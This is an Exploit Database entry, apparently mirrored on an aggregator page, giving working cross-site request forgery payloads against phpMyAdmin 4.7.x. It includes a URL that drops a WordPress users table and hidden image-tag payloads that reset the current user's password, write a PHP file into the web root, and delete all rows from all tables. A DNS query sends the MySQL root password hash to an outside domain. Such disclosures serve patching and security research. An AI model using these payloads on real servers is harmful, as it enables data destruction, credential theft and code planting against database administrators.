phpMyAdmin 4.7.x – Cross-Site Request Forgery

• Exploit Database
• 101 阅读

• 作者： VulnSpy
  日期： 2018-08-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45284/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  # Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery # Date: 2018-08-28 # Exploit Author: VulnSpy # Vendor Homepage: https://www.phpmyadmin.net/ # Software Link: https://www.phpmyadmin.net/downloads/ # Version: Versions 4.7.x (prior to 4.7.7) # Tested on: php7 mysql5 # CVE: CVE-2017-1000499 -- Original Exploit Author: Ashutosh Barot   # Original Exploit Author: Ashutosh Barot ( www.twitter.com/ashu_barot) # If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE,   https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped   # Exploit CSRF - Modifying the password of current user   <p>Hello World</p> <img src="https://www.exploit-db.com/exploits/45284/ http://server/sql.php?db=mysql&table=user&sql_query=SET%20password %20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />   # Exploit CSRF - Arbitrary File Write   <p>Hello World</p> <img src="https://www.exploit-db.com/exploits/45284/ http://server/sql.php?db=mysql&table=user&sql_query=select &apos;<?php phpinfo();?>&apos; into outfile &apos;/var/www/html/test.php&apos;;" style="display:none;" />   # Exploit CSRF - Data Retrieval over DNS   SELECT LOAD_FILE(CONCAT(&apos;\\\\&apos;,(SELECT password FROM mysql.user WHERE user=&apos;root&apos; LIMIT 1),&apos;.vulnspy.com\\test&apos;));   # Exploit CSRF - Empty All Rows From All Tables   <p>Hello World</p> <img src="https://www.exploit-db.com/exploits/45284/ http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A" style="display:none;" />